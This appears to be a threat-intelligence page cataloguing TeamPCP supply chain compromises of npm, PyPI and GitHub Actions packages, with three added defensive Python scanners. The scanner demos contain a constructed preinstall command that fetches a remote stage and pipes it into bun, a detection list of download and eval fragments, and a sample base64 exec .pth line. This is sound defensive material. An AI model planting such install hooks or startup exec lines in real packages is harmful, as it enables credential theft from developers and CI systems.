TeamPCP supply chain incidents
Group linked in public reporting to the Mini Shai-Hulud npm campaigns and related PyPI package compromises, reusing self-spreading credential-stealing payloads.
Also tracked as: Team PCP, PCP
11 confirmed incidents publicly associated with this group. Attribution reflects what the cited sources state; it is recorded for filtering, not asserted by this site.
durabletask: TeamPCP's Latest PyPI Compromise
Malicious versions of the PyPI package durabletask were published and attributed to the TeamPCP threat actor. The attack matches the tactics TeamPCP used in prior supply chain compromises.
Tags: TeamPCP, PyPI, Compromised package. Status: resolved. Severity: high.
The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave
TeamPCP conducted a multi-ecosystem supply chain compromise targeting packages under the @antv npm scope and their associated development infrastructure. The attack used GitHub, npm, and VS Code as channels to steal credentials and establish persistence.
Tags: TeamPCP, npm, Other, Account takeover, Compromised package, Malicious maintainer. Status: active. Severity: critical.
Microsoft's durabletask PyPI Package Compromised in Supply Chain Attack
Three malicious versions of Microsoft's durabletask Python package were published to PyPI on May 19, 2026, carrying a 28 KB payload that steals credentials for cloud providers (AWS, Azure, GCP), Kubernetes, password managers, and developer tools. The attack has been attributed to the TeamPCP threat group and exhibits indicators of Eastern European cybercrime operations.
Tags: TeamPCP, PyPI, Compromised package. Status: contained. Severity: critical.
TeamPCP's Mini Shai-Hulud Is Back: A Self-Spreading Supply Chain Attack Compromises TanStack npm Packages
The Mini Shai-Hulud worm is actively compromising legitimate npm packages by hijacking CI/CD pipelines and stealing developer secrets. It was first detected by StepSecurity in official @tanstack packages and is spreading across the npm ecosystem in real time.
Tags: TeamPCP, Mini Shai Hulud, npm, Other, Compromised package, Build-system compromise. Status: active. Severity: critical.
TeamPCP Injects Two-Stage Credential Stealer into xinference PyPI Package
The xinference package on PyPI was compromised with a two-stage credential stealer attributed to the TeamPCP threat actor. Users who installed the affected versions were potentially exposed.
Tags: TeamPCP, PyPI, Compromised package, Malicious maintainer. Status: contained. Severity: critical.
Bitwarden CLI Hijacked on npm: Bun-Staged Credential Stealer Targets Developers, GitHub Actions, and AI Tools
@bitwarden/cli@2026.4.0 was published to npm with a malicious preinstall hook that runs during installation and deploys an obfuscated credential stealer. The malware harvests developer secrets, GitHub Actions tokens, and AI tool configurations and exfiltrates the encrypted data to a domain impersonating Checkmarx.
Tags: Shai-Hulud, TeamPCP, npm, Compromised package. Status: contained. Severity: critical.
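The preinstall hook is what makes this class of compromise so effective: npm runs the preinstall, install and postinstall scripts of every dependency during `npm install`, before any application code is loaded, so the stealer executes the moment a developer machine or CI runner resolves the package. The scanner below is an added example written for this page, not code from Bitwarden, StepSecurity or any project mentioned here; the package names, hook commands and directory layout in its demo are constructed sample data. Its runtime counterpart is `npm install --ignore-scripts`, which disables these hooks entirely.

```python
"""Flag npm packages that declare install-time lifecycle scripts.

npm runs the preinstall, install and postinstall scripts of every dependency
automatically during `npm install`, before any application code is loaded, so a
credential stealer staged from a preinstall hook executes as soon as a developer
machine or CI runner resolves the dependency.
"""
import json
import os
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Fragments that suggest a hook downloads or evaluates code rather than compiling
# a native addon. Tuned for triage, not proof: a hit means "read this script".
SUSPICIOUS_FRAGMENTS = (
    "curl ", "wget ", "bun ", "node -e", "eval(", "base64", "powershell",
    "http://", "https://", "child_process",
)


def classify_scripts(manifest: dict) -> dict[str, list[str]]:
    """Map each install-time hook present in a parsed package.json to the
    suspicious fragments found in its command. An empty list means the hook
    exists but looks like a conventional build step (e.g. node-gyp rebuild)."""
    scripts = manifest.get("scripts") or {}
    result = {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if isinstance(command, str) and command.strip():
            result[hook] = [f.strip() for f in SUSPICIOUS_FRAGMENTS if f in command]
    return result


def scan_node_modules(root: str) -> list[tuple[str, dict[str, list[str]]]]:
    """Walk an installed node_modules tree and report every package whose
    manifest declares an install-time hook, as (package name, hooks) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue
        hooks = classify_scripts(manifest)
        if hooks:
            findings.append((manifest.get("name", dirpath), hooks))
    findings.sort(key=lambda item: item[0])
    return findings


def demo() -> dict:
    """Build a constructed node_modules tree (sample data, not real packages)
    and scan it. Returns the names flagged and which of them look suspicious."""
    samples = {
        # Constructed stand-in for a hijacked package: preinstall stages a runtime
        # and pulls a second stage from a remote host. Never executed here.
        "@example/hijacked-cli": {"scripts": {
            "preinstall": "curl -fsSL https://example.invalid/stage | bun -"}},
        # Native addon: has an install hook, but a conventional one.
        "example-native-addon": {"scripts": {"install": "node-gyp rebuild"}},
        # Pure JS library with no lifecycle scripts at all.
        "example-clean-lib": {"scripts": {"test": "node test.js"}},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            pkg_dir = os.path.join(tmp, "node_modules", *name.split("/"))
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                json.dump({"name": name, "version": "0.0.0", **body}, fh)
        findings = scan_node_modules(os.path.join(tmp, "node_modules"))
    return {
        "flagged": [name for name, _ in findings],
        "suspicious": [name for name, hooks in findings if any(hooks.values())],
    }


if __name__ == "__main__":
    print(demo())
```

Run `scan_node_modules("node_modules")` after an install performed with `--ignore-scripts` to review every hook before allowing it to run; packages with a native build step will appear in the flagged list with no suspicious fragments, which is the expected shape for node-gyp addons.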
10 Layers Deep: How StepSecurity Stops TeamPCP's Trivy Supply Chain Attack on GitHub Actions
TeamPCP compromised 76 Trivy version tags on GitHub Actions in an overnight attack, followed by a KICS compromise using the same methodology. Both attacks exfiltrated credentials from workflows that ran the malicious Action versions.
Tags: TeamPCP, Other, Container registry, Compromised package, Account takeover. Status: contained. Severity: high.
TeamPCP Plants WAV Steganography Credential Stealer in telnyx PyPI Package
On March 27, 2026, TeamPCP injected a credential stealer that hides its payload in WAV audio data into two releases of the telnyx Python SDK on PyPI. Attribution rests on cryptographic artifacts and exfiltration methods shared with the group's earlier litellm compromise.
Tags: TeamPCP, PyPI, Compromised package. Status: contained. Severity: critical.
litellm: Credential Stealer Hidden in PyPI Wheel
A critical supply chain compromise in litellm==1.82.8 on PyPI was identified on March 24, 2026. The malicious wheel carries a credential stealer in a litellm_init.pth file; because Python's site module processes .pth files in site-packages at every interpreter startup, the payload runs whenever Python starts in that environment, whether or not litellm is ever imported.
Tags: TeamPCP, PyPI, Compromised package. Status: contained. Severity: critical.
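To check an installed environment, or a wheel before installing it, for the .pth startup-execution technique used in the litellm compromise above, here is an added example written for this page (not code from the litellm project or any cited source). The litellm_init.pth contents are not reproduced; the sample .pth files, file names and directory layout in the demo are constructed, and the scanner only reads text, it never executes a .pth line.

```python
"""Find .pth files that execute code when the interpreter starts.

Python's site module reads every *.pth file in each site-packages directory at
startup. A line that begins with "import " (or "import\\t") is passed to exec();
any other non-comment line is treated as a path to append to sys.path. A package
can therefore ship a .pth that runs arbitrary code on every Python start without
the package itself ever being imported.
"""
import os
import tempfile
import zipfile


def executable_pth_lines(text: str) -> list[str]:
    """Return the lines site.py would exec() rather than treat as a path entry.
    Mirrors the startswith(("import ", "import\\t")) test in CPython's
    site.addpackage."""
    return [line for line in text.splitlines()
            if line.startswith(("import ", "import\t"))]


def scan_site_packages(root: str) -> dict[str, list[str]]:
    """Map each .pth under root that executes code to the lines it executes.
    Legitimate cases exist (setuptools' distutils-precedence.pth, editable
    installs), so the result is a review list, not a verdict."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".pth"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                lines = executable_pth_lines(fh.read())
            if lines:
                findings[os.path.relpath(path, root)] = lines
    return findings


def scan_wheel(wheel_path: str) -> dict[str, list[str]]:
    """Inspect a wheel before installing it. Wheels are zip files, and any .pth
    member lands in site-packages on install. Maps each .pth member to its
    executable lines (an empty list means it only adds paths)."""
    findings = {}
    with zipfile.ZipFile(wheel_path) as zf:
        for info in zf.infolist():
            if info.filename.endswith(".pth"):
                text = zf.read(info).decode("utf-8", errors="replace")
                findings[info.filename] = executable_pth_lines(text)
    return findings


def demo() -> dict:
    """Constructed sample environment: one benign path-only .pth, one .pth with
    an import line (text only; nothing here is executed), and a wheel carrying
    the same .pth. Returns what the two scanners report."""
    benign = "/opt/example/extra-path\n"
    constructed_malicious = (
        "# constructed sample, mimics the shape of a startup-executing .pth\n"
        "import base64, sys; exec(base64.b64decode('cHJpbnQoInNhbXBsZSIp'))\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "site-packages")
        os.makedirs(site)
        with open(os.path.join(site, "paths.pth"), "w", encoding="utf-8") as fh:
            fh.write(benign)
        with open(os.path.join(site, "example_init.pth"), "w", encoding="utf-8") as fh:
            fh.write(constructed_malicious)
        wheel = os.path.join(tmp, "example-0.0.0-py3-none-any.whl")
        with zipfile.ZipFile(wheel, "w") as zf:
            zf.writestr("example/__init__.py", "")
            zf.writestr("example_init.pth", constructed_malicious)
        return {
            "site_packages": scan_site_packages(site),
            "wheel": scan_wheel(wheel),
        }


if __name__ == "__main__":
    print(demo())
```

Point `scan_site_packages` at each entry of `site.getsitepackages()` (and the user site directory) on a machine that installed an affected version; a .pth whose import line decodes or fetches anything is the artifact to pull for forensics, and removing the file is what stops the payload from running on the next interpreter start.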
KICS GitHub Action Compromised: TeamPCP Strikes Again in Supply Chain Attack
The KICS GitHub Action maintained by Checkmarx was compromised by the TeamPCP threat actor on March 23, 2026, with 35 tags hijacked between 12:58 and 16:50 UTC. The hijacked tags delivered credential-stealing code to workflows that referenced the Action by tag in their CI/CD pipelines.
Tags: TeamPCP, Other, Account takeover. Status: contained. Severity: high.
Trivy Compromised: Everything You Need to Know about the Latest Supply Chain Attack
On March 19, 2026, threat actors attributed to "TeamPCP" injected credential-stealing malware into Aqua Security's Trivy scanner and related GitHub Actions. The compromise of a widely used container security tool potentially exposed credentials and secrets in the CI/CD environments that ran it.
Tags: TeamPCP, Container registry, Other, Compromised package, Malicious commit. Status: contained. Severity: critical.
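Both the Trivy and KICS incidents above turned on hijacked version tags: a tag is a movable pointer, so every workflow that wrote `uses: owner/action@tag` pulled the attacker's commit on its next run, while a workflow pinned to a full commit SHA kept fetching the code it had reviewed. The audit below is an added example written for this page, not from StepSecurity, Aqua Security or Checkmarx; the workflow snippet is constructed, the 40-hex value in it is a placeholder rather than a real commit, and the action slugs are the public repository names. Image references are included because a `docker://image:tag` step is mutable in exactly the same way unless it carries a digest.

```python
"""Audit GitHub Actions workflows for mutable action references.

A tag such as v1 or v0.28.0 can be re-pointed at any commit by whoever controls
the action repository or holds its credentials, and every workflow using
`uses: owner/action@tag` picks the new commit up on its next run. Pinning to a
full 40-hex commit SHA makes the reference immutable; the trailing "# vX.Y"
comment is documentation only and is not trusted by the runner.
"""
import re

# `uses:` lines in workflow or composite-action YAML, quoted or not.
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify_ref(ref: str) -> tuple[str, str]:
    """Classify one `uses:` value. Returns (kind, detail) with kind one of
    local, docker-digest-less 'mutable', sha, mutable, missing-ref."""
    if ref.startswith("./"):
        return ("local", "action in this repository, versioned with the workflow")
    if ref.startswith("docker://"):
        # Image tags move just like git tags; only a digest is immutable.
        image = ref[len("docker://"):]
        if "@sha256:" in image:
            return ("sha", image)
        return ("mutable", f"image tag {image}")
    if "@" not in ref:
        return ("missing-ref", ref)
    action, _, version = ref.rpartition("@")
    if FULL_SHA_RE.fullmatch(version):
        return ("sha", action)
    return ("mutable", f"{action} resolved via tag/branch {version!r}")


def audit_workflow(yaml_text: str) -> list[tuple[str, str, str]]:
    """Return (ref, kind, detail) for every uses: entry that is not pinned to an
    immutable SHA or digest. Local actions are reported as 'local' so the
    reviewer can confirm they are versioned with the repository."""
    report = []
    for match in USES_RE.finditer(yaml_text):
        ref = match.group(1)
        kind, detail = classify_ref(ref)
        if kind != "sha":
            report.append((ref, kind, detail))
    return report


# Constructed workflow snippet, not from any real repository. The action slugs
# are real public actions; the 40-hex value is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/trivy-action@0.28.0
      - uses: checkmarx/kics-github-action@v2.1.0
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4.0.3
      - uses: docker://ghcr.io/example/scanner:latest
      - uses: ./.github/actions/local-step
"""


if __name__ == "__main__":
    for ref, kind, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{kind:12} {ref}  ({detail})")
```

Two caveats a practitioner should keep in mind: pinning a composite or JavaScript action by SHA does not pin the actions or packages it pulls in itself, so a transitive dependency can still move; and a SHA is only as trustworthy as the review of the commit it names, so update pins through a bot that shows the diff rather than by copying whatever hash the tag currently points at.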